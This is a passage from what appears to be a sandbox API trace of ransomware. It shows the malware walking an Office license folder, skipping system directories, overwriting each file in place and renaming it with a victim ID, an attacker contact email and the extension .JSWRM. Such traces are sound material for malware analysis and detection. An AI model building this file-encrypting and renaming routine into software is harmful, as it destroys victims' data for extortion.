lpMultiByteStr=0x22cdc8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription4-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0105.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0105.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0105.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0105.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0105.484] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription4-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription4-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.485] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11646) returned 1 [0105.485] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0105.485] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0105.487] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.487] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0105.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.487] CloseHandle (hObject=0x45c) returned 1 [0105.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0105.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0105.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0105.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0105.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0105.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0105.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.488] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription4-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription4-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription4-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription4-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0105.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0105.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0105.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.489] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6949c74, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6949c74, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6aa11e8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bbb, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_Subscription5-pl.xrm-ms", cAlternateFileName="O30C10~1.XRM")) returned 1 [0105.489] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-pl.xrm-ms", lpString2=".") returned 1 [0105.489] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-pl.xrm-ms", lpString2="..") returned 1 [0105.489] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-pl.xrm-ms", lpString2="...") returned 1 [0105.489] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-pl.xrm-ms", lpString2="windows") returned -1 [0105.489] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-pl.xrm-ms", lpString2="recovery") returned -1 [0105.489] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-pl.xrm-ms", lpString2="perflogs") returned -1 [0105.489] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-pl.xrm-ms", lpString2="documents and settings") returned 1 [0105.489] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.489] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-pl.xrm-ms", lpString2="system volume information") returned -1 [0105.489] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-pl.xrm-ms", lpString2="msocache") returned 1 [0105.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0105.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription5-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0105.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription5-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription5-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0105.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0105.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0105.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription5-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0105.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription5-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription5-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0105.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0105.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0105.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0105.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0105.490] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription5-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription5-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.490] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11195) returned 1 [0105.490] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0105.490] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0105.492] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.492] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0105.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.493] CloseHandle (hObject=0x45c) returned 1 [0105.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0105.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0105.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0105.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0105.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0105.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0105.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0105.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.493] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription5-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription5-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription5-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription5-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0105.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0105.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0105.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.494] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6949c74, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6949c74, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6c6ae0b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6e65, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_Subscription5-ppd.xrm-ms", cAlternateFileName="O390D7~1.XRM")) returned 1 [0105.494] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-ppd.xrm-ms", lpString2=".") returned 1 [0105.494] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-ppd.xrm-ms", lpString2="..") returned 1 [0105.494] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-ppd.xrm-ms", lpString2="...") returned 1 [0105.494] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-ppd.xrm-ms", lpString2="windows") returned -1 [0105.494] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-ppd.xrm-ms", lpString2="recovery") returned -1 [0105.494] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-ppd.xrm-ms", lpString2="perflogs") returned -1 [0105.494] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0105.494] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.494] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-ppd.xrm-ms", lpString2="system volume information") returned -1 [0105.494] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-ppd.xrm-ms", lpString2="msocache") returned 1 [0105.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0105.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription5-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0105.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription5-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription5-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0105.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0105.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0105.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription5-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0105.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0105.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription5-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d298, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription5-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0105.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0105.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0105.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0105.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0105.495] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription5-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription5-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.495] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=28261) returned 1 [0105.495] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6e60) returned 0x24c1d0 [0105.495] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6e60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x6e60, lpOverlapped=0x0) returned 1 [0105.499] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.499] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6e60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x6e60, lpOverlapped=0x0) returned 1 [0105.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.499] CloseHandle (hObject=0x45c) returned 1 [0105.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0105.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0105.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0105.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0105.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f3a8 [0105.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0105.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.500] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription5-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription5-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription5-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription5-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0105.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0105.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0105.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.501] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe68d7584, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe68d7584, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6a0884b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d7e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_Subscription5-ul-oob.xrm-ms", cAlternateFileName="O3F187~1.XRM")) returned 1 [0105.501] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-ul-oob.xrm-ms", lpString2=".") returned 1 [0105.501] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-ul-oob.xrm-ms", lpString2="..") returned 1 [0105.501] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-ul-oob.xrm-ms", lpString2="...") returned 1 [0105.501] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-ul-oob.xrm-ms", lpString2="windows") returned -1 [0105.501] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0105.501] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0105.501] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0105.501] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.501] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0105.501] lstrcmpiW (lpString1="O365ProPlusR_Subscription5-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0105.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0105.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription5-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0105.501] RtlAllocateHeap (HeapHandle=0x1e0000, 